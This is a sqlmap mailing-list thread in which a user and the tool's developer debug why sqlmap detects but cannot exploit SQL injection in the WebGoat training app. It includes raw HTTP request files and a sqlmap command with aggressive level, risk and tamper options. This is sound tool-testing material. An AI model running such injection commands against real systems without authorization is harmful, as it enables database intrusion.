8.10.2015 v 18:10 >>>>>> Brandon Perry napsal(a): >>>>>> > You should look in the >>>>>> logs of the web server >>>>>> and see what they say. >>>>>> > >>>>>> > I bet you need >>>>>> --tamper=between >>>>>> > >>>>>> > Sent from a phone >>>>>> > >>>>>> >> On Oct 8, 2015, at >>>>>> 10:33 AM, Vojtěch Polášek >>>>>> <kr...@gm... >>>>>> <mailto:kr...@gm...>> >>>>>> wrote: >>>>>> >> >>>>>> >> Greetings, >>>>>> >> I tried to verify >>>>>> Sqlmap's functionality by >>>>>> running it against Webgoat >>>>>> >> version 6.0.1. You can >>>>>> try it your self by using >>>>>> following request file. >>>>>> >> Just log in and >>>>>> replace cookie by valid one. >>>>>> >> ###start request file >>>>>> >> POST >>>>>> /WebGoat/attack?Screen=4&menu=1100 >>>>>> HTTP/1.1 >>>>>> >> Host: localhost:8080 >>>>>> >> User-Agent: >>>>>> Mozilla/5.0 (X11; Linux >>>>>> x86_64; rv:41.0) >>>>>> Gecko/20100101 >>>>>> >> Firefox/41.0 >>>>>> >> Accept: */* >>>>>> >> Accept-Language: >>>>>> cs,en-US;q=0.7,en;q=0.3 >>>>>> >> Accept-Encoding: gzip, >>>>>> deflate >>>>>> >> Content-Type: >>>>>> application/x-www-form-urlencoded; >>>>>> charset=UTF-8 >>>>>> >> X-Requested-With: >>>>>> XMLHttpRequest >>>>>> >> Referer: >>>>>> http://localhost:8080/WebGoat/start.mvc >>>>>> >> Content-Length: 29 >>>>>> >> Cookie: JSESSIONID=replace >>>>>> >> Connection: keep-alive >>>>>> >> Pragma: no-cache >>>>>> >> Cache-Control: no-cache >>>>>> >> >>>>>> >> >>>>>> account_number=101&SUBMIT=Go! >>>>>> >> #end request file >>>>>> >> I am running git >>>>>> master of Sqlmap. >>>>>> >> Sqlmap detects SQL >>>>>> injection (boolean based >>>>>> blind Mysql), but no >>>>>> >> information gathering >>>>>> commands work (--dbs, >>>>>> --current-user...). I tried >>>>>> >> running with --hex or >>>>>> --no-cast, but no luck. >>>>>> >> What might be the problem? >>>>>> >> Thanks, >>>>>> >> Vojta >>>>>> >> >>>>>> >> >>>>>> ------------------------------------------------------------------------------ >>>>>> >> >>>>>> _______________________________________________ >>>>>> >> sqlmap-users mailing list >>>>>> >> >>>>>> sql...@li... >>>>>> <mailto:sql...@li...> >>>>>> >> >>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>> >>>>>> >>>>>> ------------------------------------------------------------------------------ >>>>>> _______________________________________________ >>>>>> sqlmap-users mailing list >>>>>> sql...@li... >>>>>> <mailto:sql...@li...> >>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>> >>>>>> >>>>>> >>>>>> >>>>>> -- >>>>>> Miroslav Stampar >>>>>> http://about.me/stamparm >>>>> >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> <mailto:sql...@li...> >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>> >>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm >>>>> >>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm >>>>> >>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> <mailto:sql...@li...> >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>> >>> >>> ------------------------------------------------------------------------------ >>> >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> <mailto:sql...@li...> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >> >> >> ------------------------------------------------------------------------------ >> >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> <mailto:sql...@li...> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Miroslav S. <mir...@gm...> - 2015-10-13 19:14:51
|
Problem is that request/responses are slow. Can't see why is this happening. Can you please send also the traffic.txt (-t traffic.txt) for such run? I don't have a clue why a simple connection test takes this slow. Bye On Oct 13, 2015 9:12 PM, "Brandon Perry" <bpe...@gm...> wrote: > Nothing looks wrong in that pastebin? It retrieved the username of SA just > fine it seems. No garbled text is in the output. > > What were you expecting to happen? > > On Tue, Oct 13, 2015 at 2:08 PM, Vojtěch Polášek <kr...@gm...> > wrote: > >> Hi, >> http://pastebin.com/Q9RKsffG >> I am running Arch Linux 64 bit and I am running Webgoat from the single >> jar file. >> I am using OpenJDK. >> Thank you, >> Vojta >> >> Dne 13.10.2015 v 18:54 Miroslav Stampar napsal(a): >> >> Yup. The master branch is a good branch. >> >> And you are having difficulties even if you use a --flush-session along >> with switches/options I've used? >> >> This is strange. I've run this numerous times in last few days. >> >> Can you please send a complete console output as I've sent for my runs? >> Also, on which OS do you run WebGoat? >> >> Bye >> On Oct 13, 2015 6:50 PM, "Vojtěch Polášek" <kr...@gm...> wrote: >> >>> Greetings, >>> now it works but... >>> I don't know what am I doing wrong, but it takes very looong time for >>> Sqlmap to finish this run. In your output, it takes several seconds, for me >>> it takes almost a hour to get this done. >>> Also I found out that if I try to use --keep-alive, it is much faster, >>> it takes about a minute, but it again returns garbled characters. No other >>> optimization switches improve the speed. >>> I am using same arguments as you, but from enumeration arguments I am >>> using just --current-user, no --dump, --dbs etc. >>> Just to be sure, I am pulling from Master branch, is this correct? >>> Thank you very much for your efford, >>> Vojtěch Polášek >>> >>> >>> Dne 13.10.2015 v 13:07 Miroslav Stampar napsal(a): >>> >>> Hi. >>> >>> There has been a lot work here. Please update to the latest revision and >>> retry it again. >>> >>> One word of advice regarding WebGoat. It has a bad routine that >>> automatically closes the SQLi after it finds certain keywords in requests. >>> Basically, afterwards it just says "* Congratulations. You have >>> successfully completed this lesson." and prevents further injection. Hence, >>> you'll need to use --safe-url and --safe-freq to reset those. Please find >>> details further in pastebin links. >>> >>> Here you can find couple of different runs: >>> >>> --technique=B >>> http://pastebin.com/04z2x00S >>> >>> (no technique constraints) >>> http://pastebin.com/UhGQLyTp >>> >>> Bye >>> >>> On Tue, Oct 13, 2015 at 10:18 AM, Miroslav Stampar < >>> <mir...@gm...>mir...@gm...> wrote: >>> >>>> Hi. >>>> >>>> There is still more work here to be done. Will let you know. I am going >>>> to try to finish it today. >>>> >>>> Bye >>>> >>>> On Tue, Oct 13, 2015 at 10:13 AM, Vojtěch Polášek <kr...@gm...> >>>> wrote: >>>> >>>>> Greetings, >>>>> I have still problems exploiting HSQL databases. current-user is still >>>>> returning garbled characters etc. >>>>> Is it still working for you? >>>>> Thanks, >>>>> Vojta >>>>> >>>>> Dne 10.10.2015 v 01:35 Miroslav Stampar napsal(a): >>>>> >>>>> I've used that same request file without any problems (with latest >>>>> patches/revision). Will retest tomorrow. Please retry everything with >>>>> --flush-session >>>>> >>>>> Bye >>>>> On Oct 10, 2015 1:17 AM, "Vojtěch Polášek" < <kr...@gm...> >>>>> kr...@gm...> wrote: >>>>> >>>>>> Greetings, >>>>>> thanks for your prompt response. >>>>>> Unfortunatelly, it is still not working as expected. >>>>>> There is problem with retrieving of current user and information from >>>>>> HSQL database in general. >>>>>> Moreover, when using following request file from the same >>>>>> application, Sqlmap identified backend database as Postgresql instead of >>>>>> HSQL. >>>>>> This request is from lesson about simple string SQL injection >>>>>> #begin request file >>>>>> POST /WebGoat/attack?Screen=36&menu=1100 HTTP/1.1 >>>>>> Host: localhost:8080 >>>>>> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 >>>>>> Firefox/39.0 >>>>>> Accept: */* >>>>>> Accept-Language: cs,en-US;q=0.7,en;q=0.3 >>>>>> Accept-Encoding: gzip, deflate >>>>>> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 >>>>>> X-Requested-With: XMLHttpRequest >>>>>> Referer: <http://localhost:8080/WebGoat/start.mvc> >>>>>> http://localhost:8080/WebGoat/start.mvc >>>>>> Content-Length: 29 >>>>>> Connection: keep-alive >>>>>> Pragma: no-cache >>>>>> Cache-Control: no-cache >>>>>> Cookie: JSESSIONID=valid_cookie >>>>>> >>>>>> account_name=Smith&SUBMIT=Go! >>>>>> #end request >>>>>> Feel free to ask me for more debugging information, I will be glad to >>>>>> help you. >>>>>> Thanks for your work, >>>>>> Vojta >>>>>> Dne 9.10.2015 v 16:52 Miroslav Stampar napsal(a): >>>>>> >>>>>> Fixed tons of bugs and pushed. Please retry it again. >>>>>> >>>>>> Bye >>>>>> >>>>>> On Fri, Oct 9, 2015 at 3:55 PM, Miroslav Stampar < >>>>>> <mir...@gm...>mir...@gm...> wrote: >>>>>> >>>>>>> Please wait a bit. There are tons of bugs for HSQLDB in sqlmap. On >>>>>>> it right now. >>>>>>> >>>>>>> Bye >>>>>>> >>>>>>> On Fri, Oct 9, 2015 at 2:20 PM, Miroslav Stampar < >>>>>>> <mir...@gm...>mir...@gm...> wrote: >>>>>>> >>>>>>>> Hi again. >>>>>>>> >>>>>>>> Please update to the latest revision and retry it again (with >>>>>>>> --flush-session). >>>>>>>> >>>>>>>> Backend used is HSQLDB while the sqlmap wrongly recognized it as >>>>>>>> MySQL (because HSQLDB is MySQL look-alike) >>>>>>>> >>>>>>>> Bye >>>>>>>> >>>>>>>> On Fri, Oct 9, 2015 at 12:49 PM, Vojtěch Polášek < >>>>>>>> <kr...@gm...>kr...@gm...> wrote: >>>>>>>> >>>>>>>>> Hi, >>>>>>>>> You can download Webgoat here: >>>>>>>>> >>>>>>>>> <https://webgoat.atlassian.net/builds/browse/WEB-WGM/latestSuccessful/artifact/shared/WebGoat-Embedded-Tomcat/WebGoat-6.0.1-war-exec.jar> >>>>>>>>> https://webgoat.atlassian.net/builds/browse/WEB-WGM/latestSuccessful/artifact/shared/WebGoat-Embedded-Tomcat/WebGoat-6.0.1-war-exec.jar >>>>>>>>> Just run java- jar WebGoat-6.0.1-war-exec.jar >>>>>>>>> And you can login at localhost:8080/WebGoat with name webgoat and >>>>>>>>> password webgoat >>>>>>>>> The request file posted earlier is from Blind numeric SQL >>>>>>>>> injection lesson. >>>>>>>>> Application is written in Java and runs on embedded Tomcat 7 >>>>>>>>> server. >>>>>>>>> I am using this command, where "request" is request file posted >>>>>>>>> earlier and valid_cookie is simply valid cookie. >>>>>>>>> python2 /opt/sqlmap/sqlmap.py -r request --level=5 --risk=3 -o >>>>>>>>> --cookie="JSESSIONID=valid_cookie' -v3 >>>>>>>>> As I stated earlier, sqlmap finds the vulnerability but can't >>>>>>>>> exploit it, I tried almost all tamper scripts, even some combinations, but >>>>>>>>> no success. >>>>>>>>> I wanted to show exploitation of Webgoat, because I would like to >>>>>>>>> use Sqlmap for testing of commercial application which is based on similar >>>>>>>>> technologies. >>>>>>>>> Thank you, >>>>>>>>> Vojta >>>>>>>>> >>>>>>>>> >>>>>>>>> Dne 9.10.2015 v 11:16 Miroslav Stampar napsal(a): >>>>>>>>> >>>>>>>>> Hi. >>>>>>>>> >>>>>>>>> Can you please send a used sqlmap command along with the basic >>>>>>>>> info on vulnerable environment (e.g. just a plain Webgoat, URL this and >>>>>>>>> that)? >>>>>>>>> >>>>>>>>> Bye >>>>>>>>> >>>>>>>>> On Thu, Oct 8, 2015 at 10:52 PM, Vojtěch Polášek < >>>>>>>>> <kr...@gm...>kr...@gm...> wrote: >>>>>>>>> >>>>>>>>>> Greetings, >>>>>>>>>> I am running Webgoat from standalone jar file, so I can't see any >>>>>>>>>> logs. >>>>>>>>>> I will try to see some logs from inside the application. Anyway, I >>>>>>>>>> didn't expect this application to contain any kind of filtering. >>>>>>>>>> I hope to show Sqlmap in action to some people from a large >>>>>>>>>> company and >>>>>>>>>> I wanted to use something simple, therefore I am quite surprised. >>>>>>>>>> I have >>>>>>>>>> never seen this situation - found injection but no possibility of >>>>>>>>>> exploitation. >>>>>>>>>> The between tamper script didn't help. >>>>>>>>>> Any suggestions are welcomed. >>>>>>>>>> Thanks, >>>>>>>>>> Vojta >>>>>>>>>> >>>>>>>>>> Dne 8.10.2015 v 18:10 Brandon Perry napsal(a): >>>>>>>>>> > You should look in the logs of the web server and see what they >>>>>>>>>> say. >>>>>>>>>> > >>>>>>>>>> > I bet you need --tamper=between >>>>>>>>>> > >>>>>>>>>> > Sent from a phone >>>>>>>>>> > >>>>>>>>>> >> On Oct 8, 2015, at 10:33 AM, Vojtěch Polášek < >>>>>>>>>> <kr...@gm...>kr...@gm...> wrote: >>>>>>>>>> >> >>>>>>>>>> >> Greetings, >>>>>>>>>> >> I tried to verify Sqlmap's functionality by running it against >>>>>>>>>> Webgoat >>>>>>>>>> >> version 6.0.1. You can try it your self by using following >>>>>>>>>> request file. >>>>>>>>>> >> Just log in and replace cookie by valid one. >>>>>>>>>> >> ###start request file >>>>>>>>>> >> POST /WebGoat/attack?Screen=4&menu=1100 HTTP/1.1 >>>>>>>>>> >> Host: localhost:8080 >>>>>>>>>> >> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:41.0) >>>>>>>>>> Gecko/20100101 >>>>>>>>>> >> Firefox/41.0 >>>>>>>>>> >> Accept: */* >>>>>>>>>> >> Accept-Language: cs,en-US;q=0.7,en;q=0.3 >>>>>>>>>> >> Accept-Encoding: gzip, deflate >>>>>>>>>> >> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 >>>>>>>>>> >> X-Requested-With: XMLHttpRequest >>>>>>>>>> >> Referer: <http://localhost:8080/WebGoat/start.mvc> >>>>>>>>>> http://localhost:8080/WebGoat/start.mvc >>>>>>>>>> >> Content-Length: 29 >>>>>>>>>> >> Cookie: JSESSIONID=replace >>>>>>>>>> >> Connection: keep-alive >>>>>>>>>> >> Pragma: no-cache >>>>>>>>>> >> Cache-Control: no-cache >>>>>>>>>> >> >>>>>>>>>> >> account_number=101&SUBMIT=Go! >>>>>>>>>> >> #end request file >>>>>>>>>> >> I am running git master of Sqlmap. >>>>>>>>>> >> Sqlmap detects SQL injection (boolean based blind Mysql), but >>>>>>>>>> no >>>>>>>>>> >> information gathering commands work (--dbs, >>>>>>>>>> --current-user...). I tried >>>>>>>>>> >> running with --hex or --no-cast, but no luck. >>>>>>>>>> >> What might be the problem? >>>>>>>>>> >> Thanks, >>>>>>>>>> >> Vojta >>>>>>>>>> >> >>>>>>>>>> >> >>>>>>>>>> ------------------------------------------------------------------------------ >>>>>>>>>> >> _______________________________________________ >>>>>>>>>> >> sqlmap-users mailing list >>>>>>>>>> >> <sql...@li...> >>>>>>>>>> sql...@li... >>>>>>>>>> >> <https://lists.sourceforge.net/lists/listinfo/sqlmap-users> >>>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>>>>> >>>>>>>>>> >>>>>>>>>> >>>>>>>>>> ------------------------------------------------------------------------------ >>>>>>>>>> _______________________________________________ >>>>>>>>>> sqlmap-users mailing list >>>>>>>>>> <sql...@li...> >>>>>>>>>> sql...@li... >>>>>>>>>> <https://lists.sourceforge.net/lists/listinfo/sqlmap-users> >>>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>>>>> >>>>>>>>> >>>>>>>>> >>>>>>>>> >>>>>>>>> -- >>>>>>>>> Miroslav Stampar >>>>>>>>> <http://about.me/stamparm>http://about.me/stamparm >>>>>>>>> >>>>>>>>> >>>>>>>>> >>>>>>>>> >>>>>>>>> ------------------------------------------------------------------------------ >>>>>>>>> >>>>>>>>> _______________________________________________ >>>>>>>>> sqlmap-users mailing list >>>>>>>>> <sql...@li...> >>>>>>>>> sql...@li... >>>>>>>>> <https://lists.sourceforge.net/lists/listinfo/sqlmap-users> >>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>>>> >>>>>>>>> >>>>>>>> >>>>>>>> >>>>>>>> -- >>>>>>>> Miroslav Stampar >>>>>>>> <http://about.me/stamparm>http://about.me/stamparm >>>>>>>> >>>>>>> >>>>>>> >>>>>>> >>>>>>> -- >>>>>>> Miroslav Stampar >>>>>>> <http://about.me/stamparm>http://about.me/stamparm >>>>>>> >>>>>> >>>>>> >>>>>> >>>>>> -- >>>>>> Miroslav Stampar >>>>>> <http://about.me/stamparm>http://about.me/stamparm >>>>>> >>>>>> >>>>>> >>>>>> >>>>>> ------------------------------------------------------------------------------ >>>>>> >>>>>> _______________________________________________ >>>>>> sqlmap-users mailing list >>>>>> sql...@li... >>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>> >>>>>> >>>>> >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>> >>>>> >>>> >>>> >>>> -- >>>> Miroslav Stampar >>>> http://about.me/stamparm >>>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >>> >>> >>> >>> ------------------------------------------------------------------------------ >>> >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> ------------------------------------------------------------------------------ >> >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > > ------------------------------------------------------------------------------ > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
48 messages has been excluded from this view by a project administrator.
